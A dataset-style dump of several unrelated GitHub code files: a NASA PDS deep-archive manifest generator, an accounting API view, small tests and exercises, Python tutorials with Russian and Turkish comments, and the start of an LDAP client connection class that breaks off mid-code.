cpapi.products_of_a_collection(lidvid, start=start, limit=_apiquerylimit, fields=_fields)\n if len(results.data) == 0: return\n start += len(results.data)\n for i in results.data:\n yield i\n\n except pds.api_client.exceptions.ApiException as ex:\n if ex.status == http.client.NOT_FOUND:\n return\n else:\n raise\n\n\ndef _addfiles(product: PdsProduct, bac: dict):\n \"\"\"Add the PDS files described in the PDS ``product`` to the ``bac``.\"\"\"\n # 😛 Apparently this API changes as frequently as my knickers. See, in some releases of pds.api-client,\n # ``Product`` entity objects have two named attributes, ``id`` and ``properties``. But then sometimes,\n # and for apparently random reasons, ``id`` and ``properties`` become indexed elements of a ``Product``.\n # So, we try to accommodate whatever the flavor du jour is.\n try:\n lidvid, props = product['id'], product['properties']\n except TypeError:\n lidvid, props = product.id, product.properties\n\n files = bac.get(lidvid, set()) # Get the current set (or a new empty set)\n\n if _propdataurl in props: # Are there data files in the product?\n # 😛 Apparently this API changes depending on the day of the week. See, in some releases of\n # pds.api-client, the URLs and MD5s are directly two sequences of the properties. And in other\n # releases, they're sequences of the ``value`` element of the properties. Why? Who knows! 
We\n # jump through this extra try…except block here so we can work with whatever the pds.api-client\n # decides to be that day.\n try:\n urls, md5s = props[_propdataurl], props[_propdatamd5] # Get the URLs and MD5s of them\n for url, md5 in zip(urls, md5s): # For each URL and matching MD5\n files.add(_File(url, md5)) # Add it to the set\n except ApiAttributeError:\n urls, md5s = props[_propdataurl]['value'], props[_propdatamd5]['value'] # Get the URLs and MD5s of them\n for url, md5 in zip(urls, md5s):\n files.add(_File(url, md5))\n\n # 😛 Apparently this API changes faster than Coinstar™. For the same reason above, sometimes the\n # URL and MD5 sequences are directly accessible from the properties, and sometimes they're in a\n # ``value`` element of properties. Whew!\n try:\n if _proplabelurl in props: # How about the label itself?\n files.add(_File(props[_proplabelurl][0], props[_proplabelmd5][0])) # Add it too\n except ApiAttributeError:\n if _proplabelurl in props: # How about the label itself?\n files.add(_File(props[_proplabelurl]['value'][0], props[_proplabelmd5]['value'][0])) # Add it too\n\n bac[lidvid] = files # Stash for future use\n\n\ndef _comprehendregistry(url: str, bundlelidvid: str, allcollections=True) -> tuple[int, dict, str]:\n \"\"\"Fathom the registry.\n\n Query the PDS API at ``url`` for all information about the PDS ``bundlelidvid`` and return a\n comprehension of it. If ``allcollections`` is True, we include every reference from a collection\n that's LID-only; if it's False, then we only include the latest reference form a LID-only reference.\n A \"comprehension of it\" means a triple of the common prefix length of all PDS paths referenced\n within it, the \"B.A.C.\" (a dict mapping PDS lidvids to sets of ``_File``s), and the title of\n the PDS bundle.\n\n If ``allcollections`` is True, we include all collections, meaning that if a bundle references\n a collection with LID only (no VID), we include all version IDs of that collection. When this\n flag ``allcollections`` is False, then we include only the *latest* collection for a LID-only\n reference.\n \"\"\"\n _logger.debug(\"🤔 Comprehending the registry at %s for %s\", url, bundlelidvid)\n\n # Set up our client connection\n config = pds.api_client.Configuration()\n config.host = url\n apiclient = pds.api_client.ApiClient(config)\n\n # This is the \"B.A.C.\" 😏\n bac: dict[str, set[_File]]\n bac = {}\n\n bundle = _getbundle(apiclient, bundlelidvid) # There's no class \"Bundle\" but class Product 🤷‍♀️\n if bundle is None:\n raise ValueError(f\"🤷‍♀️ The bundle {bundlelidvid} cannot be found in the registry at {url}\")\n\n # 😛 Did I mention this API changes **a lot?**\n #\n # The pds-api.client is pretty fickle between each release: sometimes ``title`` is an indexed value\n # of the ``bundle``, and sometimes it's a named attribute of the bundle. The try…except block here\n # handles both cases.\n try:\n title = bundle.get('title', '«unknown»')\n except AttributeError:\n title = bundle.title if bundle.title else '«unknown»'\n\n _addfiles(bundle, bac)\n\n # 😛 I'm sure I mentioned it by now!\n #\n # Ditto the above comment, but for ``metadata``'s ``label_url'.\n try:\n bundleurl = bundle['metadata']['label_url']\n except TypeError:\n bundleurl = bundle.metadata.label_url\n\n prefixlen = bundleurl.rfind(\"/\") + 1\n\n # It turns out the PDS registry makes this *trivial* compared to the PDS filesystem version;\n # Just understanding it all was there was the hard part! 😊 THANK YOU! 
🙏\n for collection in _getcollections(apiclient, bundlelidvid, allcollections):\n _addfiles(collection, bac)\n for product in _getproducts(apiclient, collection.id):\n _addfiles(product, bac)\n\n # C'est tout 🌊\n return prefixlen, bac, title\n\n\ndef _writechecksummanifest(fn: str, prefixlen: int, bac: dict) -> tuple[str, int, int]:\n \"\"\"Write an AIP \"checksum manifest\".\n\n This writes an AIP \"checksum manifest\" to the given ``fn`` PDS filename, stripping ``prefixlen``\n characters off paths, and using information from the ``bac``. Return a triple of the MD5\n of the manifest, its size in bytes, and a count of the number of entries in it.\n \"\"\"\n hashish, size, count = hashlib.new(\"md5\"), 0, 0\n with open(fn, \"wb\") as o:\n for files in bac.values():\n for f in files:\n entry = f\"{f.md5}\\t{f.url[prefixlen:]}\\r\\n\".encode(\"utf-8\")\n o.write(entry)\n hashish.update(entry)\n size += len(entry)\n count += 1\n if count % _progresslogging == 0:\n _logger.debug(\"⏲ Wrote %d entries into the checksum manifest %s\", count, fn)\n _logger.info(\"📄 Wrote AIP checksum manifest %s with %d entries\", fn, count)\n return hashish.hexdigest(), size, count\n\n\ndef _writetransfermanifest(fn: str, prefixlen: int, bac: dict) -> tuple[str, int, int]:\n \"\"\"Write an AIP \"transfer manifest\".\n\n This writes an AIP \"transfer manifest\" to the named ``fn`` PDS file, stripping ``prefixlen``\n characters off the beginnings of PDS paths, and using info in the ``bac``. Return a triple of\n the MD5 of the created manifest, its size in bytes, and a count of its entries.\n \"\"\"\n _logger.debug(\"⚙️ Writing AIP transfer manifest to %s\", fn)\n hashish, size, count = hashlib.new(\"md5\"), 0, 0\n with open(fn, \"wb\") as o:\n for lidvid, files in bac.items():\n for f in files:\n entry = f\"{lidvid:255}/{f.url[prefixlen:]:255}\\r\\n\".encode(\"utf-8\")\n o.write(entry)\n hashish.update(entry)\n size += len(entry)\n count += 1\n if count % _progresslogging == 0:\n _logger.debug(\"⏲ Wrote %d entries into the transfer manifest %s\", count, fn)\n _logger.info(\"📄 Wrote AIP transfer manifest %s with %d entries\", fn, count)\n return hashish.hexdigest(), size, count\n\n\ndef _writeaip(bundlelidvid: str, prefixlen: int, bac: dict, ts: datetime) -> str:\n \"\"\"Create the PDS Archive Information Package.\n\n This creates the PDS Archive Information Package for the given ``bundlelidvid``, stripping\n ``prefixlen`` characters off file paths and using information in the ``bac``. The ``ts``\n timestamp tells what metadata to put in the PDS label and the date for generated PDS\n filenames. 
Return a stringified version of the MD5 hash of the *checksum manifest* of the AIP.\n \"\"\"\n _logger.debug(\"⚙️ Creating AIP for %s\", bundlelidvid)\n cmfn = _makefilename(bundlelidvid, ts, \"checksum_manifest\", PDS_TABLE_FILENAME_EXTENSION)\n tmfn = _makefilename(bundlelidvid, ts, \"transfer_manifest\", PDS_TABLE_FILENAME_EXTENSION)\n cmmd5, cmsize, cmnum = _writechecksummanifest(cmfn, prefixlen, bac)\n tmmd5, tmsize, tmnum = _writetransfermanifest(tmfn, prefixlen, bac)\n lid, vid = _deurnlidvid(bundlelidvid)\n labelfn = _makefilename(bundlelidvid, ts, \"aip\", PDS_LABEL_FILENAME_EXTENSION)\n writeaiplabel(labelfn, f\"{lid}_v{vid}\", lid, vid, cmfn, cmmd5, cmsize, cmnum, tmfn, tmmd5, tmsize, tmnum, ts)\n _logger.info(\"📄 Wrote label for them both: %s\", labelfn)\n return cmmd5\n\n\ndef _writesip(bundlelidvid: str, bac: dict, title: str, site: str, ts: datetime, cmmd5: str):\n \"\"\"Write a Submission Information Package.\n\n This writes a Submission Information Package based on the ``bac`` to the current directory\n generating PDS filenames and other label metadata from the timestamp ``ts`` and ``bundlelidvid``.\n The ``cmmd5`` is the MD5 digest of the PDS Archive Information Package's transfer manifest and\n also goes into the PDS label. The PDS ``site`` is a string like ``PDS_ATM`` indicating the\n PDS site. You'd think we could get that from the PDS API but 🤷‍♀️.\n \"\"\"\n _logger.debug(\"⚙️ Creating SIP for %s (title %s) for site %s\", bundlelidvid, title, site)\n sipfn = _makefilename(bundlelidvid, ts, \"sip\", PDS_TABLE_FILENAME_EXTENSION)\n hashish, size, count = hashlib.new(\"md5\"), 0, 0\n with open(sipfn, \"wb\") as o:\n for lidvid, files in bac.items():\n for f in files:\n entry = f\"{f.md5}\\tMD5\\t{f.url}\\t{lidvid}\\r\\n\".encode(\"utf-8\")\n o.write(entry)\n hashish.update(entry)\n size += len(entry)\n count += 1\n if count % _progresslogging == 0:\n _logger.debug(\"⏲ Wrote %d entries into the submission info file %s\", count, sipfn)\n _logger.info(\"📄 Wrote SIP %s with %d entries\", sipfn, count)\n labelfn = _makefilename(bundlelidvid, ts, \"sip\", PDS_LABEL_FILENAME_EXTENSION)\n _logger.info(\"📄 Wrote label for SIP: %s\", labelfn)\n with open(labelfn, \"wb\") as o:\n lid, vid = _deurnlidvid(bundlelidvid)\n writesiplabel(lid, vid, title, hashish.hexdigest(), size, count, \"MD5\", sipfn, site, o, cmmd5, ts)\n\n\ndef generatedeeparchive(url: str, bundlelidvid: str, site: str, allcollections=True):\n \"\"\"Make a PDS \"deep archive\" 🧘 in the current directory.\n\n A PDS \"deep archive\" 🧘‍♀️ (consisting of the Archive Information Package's transfer manifest and\n checksum manifest, and the Submission Information Package's table file—plus their corresponding\n labels) for the named PDS bundle identified by ``bundlelidvid``, for the PDS ``site``, using knowledge\n in the PDS Registry at ``url``, including ``allcollections`` if True else just the latest collection\n for PDS bundles that reference collections by logical identifier only.\n \"\"\"\n # When is happening? 
Make a timestamp and remove the timezone info\n ts = datetime.utcnow()\n ts = datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second, microsecond=0, tzinfo=None)\n\n # Figure out what we're dealing with\n prefixlen, bac, title = _comprehendregistry(url, bundlelidvid, allcollections)\n\n # Make it rain ☔️\n cmmd5 = _writeaip(bundlelidvid, prefixlen, bac, ts)\n _writesip(bundlelidvid, bac, title, site, ts, cmmd5)\n\n\ndef main():\n \"\"\"Check the command line and make a PDS Deep Archive for the named PDS bundle LIDVID.\"\"\"\n parser = argparse.ArgumentParser(description=_description)\n parser.add_argument(\"--version\", action=\"version\", version=f\"%(prog)s {__version__}\")\n addloggingarguments(parser)\n addbundlearguments(parser)\n parser.add_argument(\n \"-u\", \"--url\", default=_defaultserver, help=\"URL to the PDS API of the PDS Registry to use [%(default)s]\"\n )\n parser.add_argument(\n \"-s\", \"--site\", required=True, choices=PROVIDER_SITE_IDS, help=\"Provider site ID for the manifest's label\"\n )\n parser.add_argument(\"bundle\", help=\"LIDVID of the PDS bundle for which to create a PDS Deep Archive\")\n args = parser.parse_args()\n logging.basicConfig(level=args.loglevel, format=\"%(levelname)s %(message)s\")\n _logger.info(\"👟 PDS Deep Registry-based Archive, version %s\", __version__)\n _logger.debug(\"💢 command line args = %r\", args)\n try:\n generatedeeparchive(args.url, args.bundle, args.site, not args.include_latest_collection_only)\n except pds.api_client.exceptions.ApiException as ex:\n if ex.status == http.client.INTERNAL_SERVER_ERROR:\n _logger.critical(\n \"🚨 The server at %s gave an INTERNAL SERVER ERROR; you should contact its administrator if you \"\n \"can figure out who that is. The following information may be helpful to them in figuring out \"\n \"the issue: «%r»\",\n args.url.rstrip('/'),\n ex.body,\n )\n sys.exit(-2)\n _logger.exception(\"💥 We got an unexpected error; sorry it didn't work out\")\n sys.exit(-3)\n finally:\n _logger.info(\"👋 Thanks for using this program! Bye!\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# Notes\n# =====\n#\n# The following are stream-of-consciousness notes I made while developing this and may be ignored:\n#\n# matches = bundles.get_bundles(q='livi eq urn:nasa:pds:insight_documents:document_hp3rad::5.0')\n# matches = collections.get_collection(q='lidvid eq urn:nasa:pds:insight_documents:document_hp3rad::5.0')\n# matches = products.products(q='lidvid eq urn:nasa:pds:insight_documents:document_hp3rad::5.0', start=0, limit=9999)\n# matches = otherAPI.products_of_a_collection('urn:nasa:pds:insight_documents:document_hp3rad::8.0', start=0, limit=999)\n# print(matches)\n\n# We can do this way:\n# matches = bundles.get_bundles(q='lidvid eq {lidvid}\"')\n\n# Or we can do it this way:\n# bundle = bundles.bundle_by_lidvid('urn:nasa:pds:insight_documents::2.0')\n# At this point we have:\n# - bundle.id - the lidvid\n# - Possible filepath entry:\n# - bundle.metadata.label_url ???\n# - ops:Label_File_Info.ops:file_ref ???\n# - ops:Label_File_Info.ops:md5_checksum\n# - bundle.type - if this is \"Product_Collection\" then we can say \"isProductCollection\" is True\n# - May not have to worry about this? 
API might actually collate this for us\n# - bundle.properties\n# - pds:Bundle_Member_Entry.pds:lid_reference (perhaps there is pds:Bundle_Member_Entry.pds:lidvd_reference)?\n# - pds:Bundle_Member_Entry.pds:member_status (Primary or Secondary)\n#\n# - ops:Data_File_Info.ops:md5_checksum\n# - ops:Data_File_Info.ops:file_ref - maybe we can make the filepath out of this?\n# pprint(bundle)\n#\n# if aip: _writeaip(bundlelidvid, prefixlen, bac, ts)\n# if sip: _writesip(bundlelidvid, bac, ts)\n#\n# # xxx = bcapi.collections_of_a_bundle(bundlelidvid) # type of each = ``Product_Collection``\n# # xxx = bcapi.collections_of_a_bundle(bundlelidvid,\n# fields=['ops:Label_File_Info.ops:md5_checksum']) # type of each = ``Product_Collection``\n#\n# # The lidvid below comes from one of the responses iterating over xxx.data:\n# print('before')\n# for product in cpapi.products_of_a_collection('urn:nasa:pds:insight_documents:document_hp3rad::8.0').data:\n# print(product.id)\n# print('after')\n# for product in _getproducts(apiclient, 'urn:nasa:pds:insight_documents:document_hp3rad::8.0'):\n# print(product.id)\n# return\n\n# Approach then:\n# Get the bundle (to see if it's valid mostly but also get its fileref + md5)\n# Add the bundle + md5 to the b-a-collection\n# For each collection of the bundle:\n# add the collection + md5 to the b-a-collection\n# add any ops:Data_File_Info.ops:file_ref + md5 to the b-a-collection\n# for each product of a collection:\n# add the product + md5 to the b-a-collection\n# add the file_ref + md5 to the b-a-collection\n# Then write out the sip and aip of the b-a-collection\n#\n# Tables\n# - labels (lid, vid)\n# - inter_table_references (lid, vid, to_lid, to_vid (may be null))\n# - label_file_references (lid, vid, filepath)\n#\n# We may have to dump all that because the registry API seems to give a lot of data immediately\n# blobs? 
blobs???\n#\n# Using the https://pds.nasa.gov/api/search/1.0/ directly (without the Python pds.api_client):\n#\n# We are normally passed a bundle.xml file; we can get its info directly with:\n#\n# curl -X GET --header 'Accept: application/vnd.nasa.pds.pds4+xml' \\\n# 'https://pds.nasa.gov/api/search/1.0/bundles/urn%3Anasa%3Apds%3Ainsight_documents%3A%3A2.0'\n#\n# This gives (PDS4 XML; the element names here are a best-effort reconstruction —\n# the original tags were stripped out during transcription):\n#\n# <Product_Bundle>\n#   <Identification_Area>\n#     …\n#   </Identification_Area>\n#   …\n#   <File_Area_Text>\n#     <File>\n#       <file_name>readme.txt</file_name>\n#       <comment>Introduction to the bundle</comment>\n#     </File>\n#   </File_Area_Text>\n#\n#   …\n#   <Bundle_Member_Entry>\n#     <lid_reference>urn:nasa:pds:insight_documents:document_mission</lid_reference>\n#     <member_status>Primary</member_status>\n#     <reference_type>bundle_has_document_collection</reference_type>\n#   </Bundle_Member_Entry>\n#   …\n#   <Bundle_Member_Entry>\n#     <lid_reference>urn:nasa:pds:insight_documents:document_hp3rad</lid_reference>\n#     <member_status>Primary</member_status>\n#     <reference_type>bundle_has_document_collection</reference_type>\n#   </Bundle_Member_Entry>\n#   …\n# </Product_Bundle>\n","repo_name":"NASA-PDS/deep-archive","sub_path":"src/pds2/aipgen/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":24918,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"}
+{"seq_id":"23639443413","text":"from gkcore.utils import authCheck\nfrom pyramid.view import view_defaults, view_config\nfrom gkcore import eng, enumdict\nfrom gkcore.models.gkdb import goprod, product\nfrom sqlalchemy.sql import select, and_\n\n\n@view_defaults(route_name=\"godown-register\")\nclass api_godownregister(object):\n    def __init__(self, request):\n        self.request = request\n\n    @view_config(request_method=\"GET\", renderer=\"json\")\n    def godown_register(self):\n        # Check whether the user is registered & valid\n        try:\n            token = self.request.headers[\"gktoken\"]\n        except KeyError:\n            return {\"gkstatus\": enumdict[\"UnauthorisedAccess\"]}\n\n        auth_details = authCheck(token)\n\n        if not auth_details[\"auth\"]:\n            return {\"gkstatus\": enumdict[\"UnauthorisedAccess\"]}\n\n        goproddetails = None\n        godownstock = []\n        godown_items = []\n        goid = self.request.matchdict[\"goid\"]\n\n        # Connecting to the DB table goprod & filtering the data for required org & godown\n\n        try:\n            result = eng.connect().execute(\n                select([goprod]).where(\n                    and_(\n                        goprod.c.orgcode == auth_details[\"orgcode\"],\n                        goprod.c.goid == goid,\n                    )\n                )\n            )\n            goproddetails = result.fetchall()\n\n        except Exception:\n            return {\"gkstatus\": enumdict[\"ConnectionFailed\"]}\n\n        # Connecting to the DB table product & filtering the data for the required productcode\n\n        for productid in goproddetails:\n            try:\n                result = eng.connect().execute(\n                    select([product]).where(\n                        product.c.productcode == productid[\"productcode\"]\n                    )\n                )\n                godownstock.append(result.fetchone())\n            except Exception as e:\n                print(e)\n                return {\"gkstatus\": enumdict[\"ConnectionFailed\"]}\n\n        # Formatting the fetched data: keep JSON-friendly primitives as-is and stringify\n        # everything else (e.g. dates); the exact type-string compared against in the\n        # original was lost in transcription, so an isinstance check is used here instead\n\n        for p in godownstock:\n            temp_dict = dict()\n            for name, val in p.items():\n                if isinstance(val, (str, int, float, bool)) or val is None:\n                    temp_dict[name] = val\n                else:\n                    temp_dict[name] = str(val)\n            godown_items.append(temp_dict)\n\n        return {\"gkstatus\": enumdict[\"Success\"], \"gkresult\": godown_items}\n","repo_name":"gnukhata/gkcore","sub_path":"gkcore/views/reports/api_godownregister.py","file_name":"api_godownregister.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"29316572655","text":"import pytest\n\nfrom src.problems.longest_substr_with_two_dist_chars import Solution\n\n\n@pytest.mark.parametrize(\n    \"s,expected\",\n    [\n        (\"eceba\", 3),\n        (\"ccaabbb\", 5),\n        (\"ababcbcbaaabbdef\", 6),\n    ]\n)\n
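# each case is (input string, expected length of the longest substring with at most two distinct characters)\n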
Solution().lengthOfLongestSubstringTwoDistinct(s) == expected\n","repo_name":"yyunikov/coding-python","sub_path":"tests/problems/longest_substr_with_two_dist_chars_test.py","file_name":"longest_substr_with_two_dist_chars_test.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14248623735","text":"from rest_framework import filters, mixins, viewsets\n\nfrom .permissions import IsAdminOrReadOnly\n\n\nclass GetPostDeleteViewSet(\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n permission_classes = (IsAdminOrReadOnly,)\n filter_backends = (filters.SearchFilter,)\n search_fields = ('name',)\n lookup_field = 'slug'\n","repo_name":"0z0nize/api_yamdb","sub_path":"api_yamdb/core/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"33007330756","text":"# 1-задание: перевернуть строку \"phew\" -> \"wehp\"___________________________________________________________________________________\n\n# перевернутая копия строки\nstr = \"phew\" [::-1]\nprint(str)\n\n# с помощью встроенной функции reversed\nstr=''.join(reversed('phew'))\nprint(str)\n\n\n# 2 - задание: ____________________________________________________________________________________________________________________\n# У list - списка очень много методов потому что он изменяеиый, можно изменять элементы в списке. А у кортежа всего лишь два метода,\n# потому что он не изменямый тип. \n\n# метод Append ===========================================================================================================\n# добавляет элемент в конец списка\n\nnumbers=['one','two','three']\nnumbers.append('four')\nprint(numbers)\n\n# добавляет список в сущ.список\nnames=['Tom','Leonardo']\nfamily_names=('Hanks', 'DiCaprio')\nnames.append(family_names)\nprint(names)\n\n# метод Count ==============================================================================================================\n# показывает сколько раз был показан заданный элемент в списке\nnumbers = [1, 2, 3, 3, 4]\nx = numbers.count(3)\nprint(x)\n\nnames=[\"Tom\", \"Leo\", \"Tom\"]\nx=names.count(\"Tom\")\nprint(x)\n\n# метод Copy ================================================================================================================== \nseasons=['winter', 'spring', 'summer', 'autumn']\nx=seasons.copy()\nprint(x)\n\n# метод Insert ================================================================================================================ \n# добавляет элемент в определенную позицию\nseasons=['winter', 'summer', 'autumn']\nseasons.insert(1, 'spring')\nprint(seasons)\n\n# метод Sort ================================================================================================================== \n#сортирование списка в алфавитном порядке\nfruits=['banana', 'apple', 'orange']\nfruits.sort()\nprint(fruits)\n\n\n# метод Extend ================================================================================================================\n# добавление двух списков в один\nfruits=['banana', 'apple', 'orange']\nberries=['strawberry', 'raspberry', 'cherry']\nfruits.extend(berries)\nprint(fruits)\n\n# метод pop ================================================================================================================\n# убирает элемент с заданной позиции если ничего не писать никакой 
index, it removes the last value\n# remove deletes by value \n\nberries=['strawberry', 'raspberry', 'cherry']\nberries.pop(2)\nprint(berries)\n\n# prints the popped element\nberries=['strawberry', 'raspberry', 'cherry']\nx=berries.pop(2)\nprint(x)\n\n# index method ==============================================================================================================\n# shows at which index a given element is located\nberries=['strawberry', 'raspberry', 'cherry']\nx=berries.index('raspberry')\nprint(x)\n\n# returns the index of the first occurrence of the given element\n\nberries=['strawberry', 'raspberry', 'cherry', 'strawberry']\nx=berries.index('strawberry')\nprint(x)\n\n\n\n","repo_name":"arssabina/FSPR-422","sub_path":"semester_1/HOMEWORK/les_5_д.з.py","file_name":"les_5_д.з.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13186471765","text":"class Solution:\n    def rotate(self, nums: List[int], k: int) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n        l = len(nums)\n        t = k%l\n        if(l==1 or t==0):\n            return nums\n        nums[:] = nums[-t:] + nums[:l-t]\n        # print(nums)\n        ","repo_name":"Euicheon/LeetCode","sub_path":"189-rotate-array/189-rotate-array.py","file_name":"189-rotate-array.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39128565543","text":"\"\"\"\nclass Car:\n    pass\n\ncar1 = Car()\ncar2 = Car()\nprint(Car)\nprint(car1)\nprint(car2)\n\nclass Products:\n    pass\np1 = Products() # macbook air\np2 = Products() # hp pavilion\np3 = Products() # asus zenbook\n\nlistProducts = [p1, p2, p3]\nfor p in listProducts:\n    print(p)\n    print(type(p))\n\"\"\"\n\n\n# in the commented-out block above we learned how to create a class\n\n\n# in the section below we will learn how to use the init method :)\n\"\"\"\nclass Urunler:\n    def __init__(self): # constructor method\n        self.name = \"Mercedes C200\"\n        self.price = \"$ 20,000\"\n        print(\"Product object created!\")\n\nurun_1 = Urunler()\nurun_2 = Urunler()\n\nprint(urun_1.name, urun_2.name, urun_1.price)\n\"\"\"\n# above we want urun_1 and urun_2 to be different objects, but we get the same results!\n# This is not the preferred usage :) Let's proceed step by step\n\n\n# Step 1: I specified the name and price parameters.\n# That is, for each product we created the name, price and isActive parameters on self.\n# I added isActive for the \"is the product on sale?\" question and defined it as True by default.\nclass Urunler:\n    def __init__(self, name, price, isActive=True):\n        self.name = name\n        self.price = price\n        self.isActive = isActive\n        print(\"Product object created!\")\n\n\n# Step 2: I defined the products\n# urun_1 = Urunler(name,price,isActive)\nurun_1 = Urunler(\"Maserati Ghibli\", \"32,000.00 €\")\n# urun_2 = Urunler(name,price,isActive)\nurun_2 = Urunler(\"Subaru XV\", \"44,000.00€\")\n# urun_3 = Urunler(name,price,isActive)\nurun_3 = Urunler(\"Seat Ateca\", \"34,000.00€\", False)\n# if isActive = True there is no need to specify it; specifying False is enough\n\n\n# Step 3: I printed the output\nprint(urun_1.name, urun_1.price, urun_1.isActive)\nprint(urun_2.name, urun_2.price, urun_2.isActive)\nprint(urun_3.name, urun_3.price, urun_3.isActive)\n\"\"\"\nimportant!!!!!!!!\nIn the __init__() function, the self parameter represents our product in this example.\nWhat is our product? A car;\nits name, i.e. its brand, through name,\nits 
price,\nand whether it is on sale through isActive.\n We never forget what self is! Self matters \n\"\"\"","repo_name":"tunahantatli/BackendTraining","sub_path":"pythonTraining/OOP/create_class.py","file_name":"create_class.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32412638828","text":"import asyncio\n\n\nfrom msldap import logger\nfrom msldap.commons.common import MSLDAPClientStatus\nfrom msldap.protocol.messages import LDAPMessage, BindRequest, \\\n\tprotocolOp, AuthenticationChoice, SaslCredentials, \\\n\tSearchRequest, AttributeDescription, Filter, Filters, \\\n\tControls, Control, SearchControlValue, AddRequest, \\\n\tModifyRequest, DelRequest\n\nfrom msldap.protocol.utils import calcualte_length\nfrom msldap.protocol.typeconversion import convert_result, convert_attributes, encode_attributes, encode_changes\nfrom msldap.protocol.query import escape_filter_chars, query_syntax_converter\nfrom msldap.commons.authbuilder import AuthenticatorBuilder\nfrom msldap.commons.credential import MSLDAP_GSS_METHODS\nfrom msldap.network.selector import MSLDAPNetworkSelector\nfrom msldap.commons.credential import LDAPAuthProtocol\nfrom msldap.commons.target import LDAPProtocol\nfrom asn1crypto.x509 import Certificate\nfrom hashlib import sha256\nfrom minikerberos.gssapi.channelbindings import ChannelBindingsStruct\n\nclass MSLDAPClientConnection:\n\tdef __init__(self, target, creds):\n\t\tself.target = target\n\t\tself.creds = creds\n\t\tself.auth = AuthenticatorBuilder(self.creds, self.target).build()\n\t\tself.connected = False\n\t\tself.bind_ok = False\n\t\tself.__sign_messages = False\n\t\tself.__encrypt_messages = False\n\t\tself.network = None\n\n\t\tself.handle_incoming_task = None\n\t\tself.status = MSLDAPClientStatus.RUNNING\n\t\tself.lasterror = None\n\n\t\tself.message_id = 0\n\t\tself.message_table = {}\n\t\tself.message_table_notify = {}\n\t\tself.encryption_sequence_counter = 0 # this will be set by the underlying auth algo\n\t\tself.cb_data = None # for channel binding\n\n\tasync def __handle_incoming(self):\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\tmessage_data, err = await self.network.in_queue.get()\n\t\t\t\tif err is not None:\n\t\t\t\t\tlogger.debug('Client terminating because __handle_incoming got an error!')\n\t\t\t\t\traise err\n\t\t\t\t\n\t\t\t\t#print('Incoming message data: %s' % message_data)\n\t\t\t\tif self.bind_ok is True:\n\t\t\t\t\tif self.__encrypt_messages is True:\n\t\t\t\t\t\t#removing size\n\t\t\t\t\t\tmessage_data = message_data[4:]\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t# seq number doesn't matter here, as it's in the header\n\t\t\t\t\t\t\tmessage_data, err = await self.auth.decrypt(message_data, 0 )\n\t\t\t\t\t\t\tif err is not None:\n\t\t\t\t\t\t\t\traise err\n\t\t\t\t\t\t\t#print('Decrypted %s' % message_data.hex())\n\t\t\t\t\t\t\t#print('Decrypted %s' % message_data)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\timport traceback\n\t\t\t\t\t\t\ttraceback.print_exc()\n\t\t\t\t\t\t\traise\n\t\t\t\t\t\t\n\t\t\t\t\telif self.__sign_messages is True:\n\t\t\t\t\t\t#print('Signed %s' % message_data)\n\t\t\t\t\t\tmessage_data = message_data[4:]\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tmessage_data = await self.auth.unsign(message_data)\n\t\t\t\t\t\t#\tprint('Unsigned %s' % message_data)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\timport traceback\n\t\t\t\t\t\t\ttraceback.print_exc()\n\t\t\t\t\t\t\traise\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmsg_len = 
calcualte_length(message_data)\n\t\t\t\tmsg_total_len = len(message_data)\n\t\t\t\tmessages = []\n\t\t\t\tif msg_len == msg_total_len:\n\t\t\t\t\tmessage = LDAPMessage.load(message_data)\n\t\t\t\t\tmessages.append(message)\n\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t#print('multi-message!')\n\t\t\t\t\twhile len(message_data) > 0:\n\t\t\t\t\t\tmsg_len = calcualte_length(message_data)\n\t\t\t\t\t\tmessage = LDAPMessage.load(message_data[:msg_len])\n\t\t\t\t\t\tmessages.append(message)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmessage_data = message_data[msg_len:]\n\n\t\t\t\tmessage_id = messages[0]['messageID'].native\n\t\t\t\tif message_id not in self.message_table:\n\t\t\t\t\tself.message_table[message_id] = []\n\t\t\t\tself.message_table[message_id].extend(messages)\n\t\t\t\tif message_id not in self.message_table_notify:\n\t\t\t\t\tself.message_table_notify[message_id] = asyncio.Event()\n\t\t\t\tself.message_table_notify[message_id].set()\n\t\t\n\t\texcept asyncio.CancelledError:\n\t\t\tself.status = MSLDAPClientStatus.STOPPED\n\t\t\treturn\n\n\t\texcept Exception as e:\n\t\t\tself.status = MSLDAPClientStatus.ERROR\n\t\t\tself.lasterror = e\n\t\t\tfor msgid in self.message_table_notify:\n\t\t\t\tself.message_table[msgid] = [e]\n\t\t\t\tself.message_table_notify[msgid].set()\n\t\t\n\t\tself.status = MSLDAPClientStatus.STOPPED\n\n\n\tasync def send_message(self, message):\n\t\tcurr_msg_id = self.message_id\n\t\tself.message_id += 1\n\n\t\tmessage['messageID'] = curr_msg_id\n\t\tmessage_data = LDAPMessage(message).dump()\n\n\t\tif self.bind_ok is True:\n\t\t\tif self.__encrypt_messages is 